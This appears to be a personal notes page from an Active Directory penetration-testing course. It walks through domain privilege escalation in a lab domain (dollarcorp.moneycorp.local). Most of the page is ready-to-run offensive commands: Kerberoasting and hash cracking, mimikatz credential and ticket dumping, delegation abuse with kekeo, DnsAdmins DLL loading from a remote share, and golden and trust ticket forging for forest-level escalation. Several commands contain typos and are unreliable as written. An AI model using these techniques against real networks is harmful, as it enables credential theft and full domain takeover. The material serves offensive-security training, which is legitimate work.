🔴Domain PrivEsc

Kerberoasting

After sending a valid TGT to KDC/DC (step 3) ,it return us a TGS (step 4) which is encrypted with hash of service account , we can store that TGS on system and manually crack the hash of service account. service account can be a user account or system account , so we will focus on user service accounts

get users used as service accounts

get-netuser -SPN

request a ticket (TGS)

request-SPNTicket

add-type -Assemblyname system.identitymodel

new-object system.identitymodel.tokens.kerberosRequestorSecurityToken -Argumenylist "ops/whatever1"

check if TGS granted

klist

save hash from memory to disk

invoke-mimikatz -command '"kerberos::list /export"'

crack the hash

python.exe .\tgscrack.py .\<wordlist> .\<hash>

we can also use john or hashcat

Targeted Kerberoasting

if any user's kerberos preauth is disabled i.e., (UserAccountControlSetting = Do Not Require Kerberos PreAuthenticantion) , we can brute force a TGT reciecved for KDC Also with sufficient rights (Genericwrite , genericall) , we can force to disable the Kerberos

get-domianuser -preauthnotrequired -verbose

force disable preauth Enumerate permission of RDPusers on ACLs

Invoke-ACLScanner -resolveGUIDs | ?{$_IdentityRefrencename -match "RDPUsers"}

set-domainobject -identity <username> -XOR @{useraccountcontrol=123455} -verbose

check

set-domainobject -identity <username> | select serviceprincipalname

After that , see if user already has SPN

get-domainuser -identity <username> | select serviceprincipalname

After that we can perform classic kerberoasting attack as well

Kerberos Delegation

2 types of delegation

constrained Delegation

it allows to reuse the end-user credentials to access resources hosted on a different server

It is useful in multi-tier services where kerberos double hop is required

Unconstrained Delegation

to solve this Unconstrained Delegation comes in place

when it is set for a particular service account , it allows user to access any service to any resource on the domain

Unconstrained Delegation

we can access any services on any computer

discover computers which have unconstrained delegation

get-netcomputer -unconstrained

check if DA token is available

invoke-mimikatz -command '"sekurlsa::tickets"'

invoke-mimikatz -command '"sekurlsa::tickets /export"'

pull / check session

invoke-userhunter -computername dcorp-appsrv -poll 100 -username Administrator -delay 5 -verbose

the DA token could be reused

invoke-mimikatz -command '"kerberos::ptt <path - optional> <TGT>"'

Constrained Delegation

we can only access specified services on specified computer

when Constrained Delegation is enabled on service account , it allow access only to specified service on specified computer as the user is from service account
when user is authenticated to 1st service (web server) without kerberos & try to access 2nd service (database server) web server connects to DC in order to authenticate user for 2nd service
for authorizing the user web server request TGS without giving user password
KDC checks for user's useraccountcontrol for attribute T2A4D
- T2A4D = TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION
here S4U extension gets activated , which further provide 2 extensions
- S4U2self = service for user to self
- S4U2proxy = service for user to proxy
if T2A4D is ok then S4U2self is provided to 1st service (web services)
then service returns S4U2self to KDC along with that specific service in order to get S4U2proxy
KDC checks msDS-AllowedToDelegate , if ok KDC returns S4U2proxy to 1st service (web services)
- msDS-AllowedToDelegate contains list of SPNs for which user token can be forwarded
S4U2proxy allows the 1st service (web services) to obtain a TGS
then user gets authenticated to 2nd service

abusing constrained delegation

to abuse constrained delegation firstly we need access to service account (websvc)

enumerate users & computers with constrained delegation

get-domainuser -trustedtoauth

get-domaincomputer -trustedtoauth

get-domainuser -trustedtoauth | select name,msds-allowedtodelegateto

get-domaincomputer -trustedtoauth | select name,msds-allowedtodelegateto

requesting TGT note :- we need pass or hash for websvc (service-account)

. .\kekeo\Win32\kekeo.exe

tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:<hash>

requesting TGS

tgs::S4U /tgt:<TGT> /user:Administrator@dollarcorp.moneycorp.local /serive:<service-name>

Requesting TGT & TGS of time service for dcorp-adminsrv

tgt::ask /user:dcorp-adminsrv /domain:dollarcorp.moneycorp.local /rc4:<hash>

tgs::S4U /tgt:<TGT> /user:Administrator@dollarcorp.moneycorp.local /serive:time/dcorp-dc.dollarcorp.moneycorp.local

DNS Admin

In cases DC can also serve as DNS and it is possible for DNSAdmins group members to load arbitary DLL with privileges of dns.exe (SYSTEM)

so, if we had DC access we can use to escalate privileges to DA by using DNS

NOTE:- we need to restart DNS services

Enumerate DNSAdmins group

get-netgroupmember -groupname "DNSAdmins"

making connection

invoke-mimikatz -command '"securlsa:pth /user:srvadmin /domain:dollarcorp.moneycorp.local /ntlm:<hash>"'

after that we need RSAT DNS

by using DNSAdmin priviliges configure DLL

dnscmd dcorp-dc /config /serverlevelplugindll \\<ip-address>\dll\mimilib.dll

by using DNSServer module

$dnssettings = get-dnsserversetting -computername dcorp-dc -verbose -all

dnssetting.serverlevelplugindll = "172.211.21.21\dll\mimilib.dll"

set-dnsserversetting -inputobject $dnssetting -computername dcorp-dc -verbose

mimilib.dll = it logs all DNS queries to C:\Windows\System32\Kiwidns.log

restart services

\\dcorp-dc stop dns

\\dcorp-dc start dns

Enterprise Admins

this is a child to parent (Forest Root) privesc and 2 ways to perform that

krbtgt hash
trust tickets

Escalating privileges using Trust Tickets

in order to forge trust tickets , we need trust key. For that we have to look for [IN] trust key

invoke-mimikatz -command '"lsadump::trust /patch"' -computername dcorp-dc

invoke-mimikatz -command '"lsadump::dcsync /user:dcorp\mcorp$"'

forging inter-realm TGT

invoke-mimikatz -command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:SID-of-current-domain /sids:SID-of-enterprise-admin-group /rc4:key-value /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\kekeo_old\trust-tkt.kirbi"'

using forge trust ticket requesting TGS in the target domain

.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local

other services :- CIFS , HOST , RPCSS ,WMI

using TGS to access targated service (may need to run twice)

./kirbikator.exe lsa .\CIFS.mcorp-dc.moneycorp.local.kirbi

ls \\mcorp-dc.moneycorp.local\c$

klist

Escalating privileges using krbtgt hash

we will abuse SID history once again

invoke-mimikatz -command '"lsadump::lsa /patch"'

invoke-mimikatz -command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:SID-of-current-domain /sids:SID-of-enterprise-admin-group /krbtgt:key-value /ticket:C:\AD\Tools\kekeo_old\krbtgt-tkt.kirbi"'

NOTE:- in above command "sids" is forcefully setting the SID history of forest enterprise admin group

invoke-mimikatz -command '"kerberos::ptt C:\AD\Tools\krbtgt-tkt.kirbi"'

ls \\mcorp-dc.moneycorp.local\c$

PreviousDomain Presistance NextCross Forest Attacks

Last updated 2 years ago

hashtagKerberoasting

hashtagTargeted Kerberoasting

hashtagKerberos Delegation

hashtagUnconstrained Delegation

hashtagConstrained Delegation

hashtagabusing constrained delegation

hashtagDNS Admin

hashtagEnterprise Admins

hashtagEscalating privileges using Trust Tickets

hashtagEscalating privileges using krbtgt hash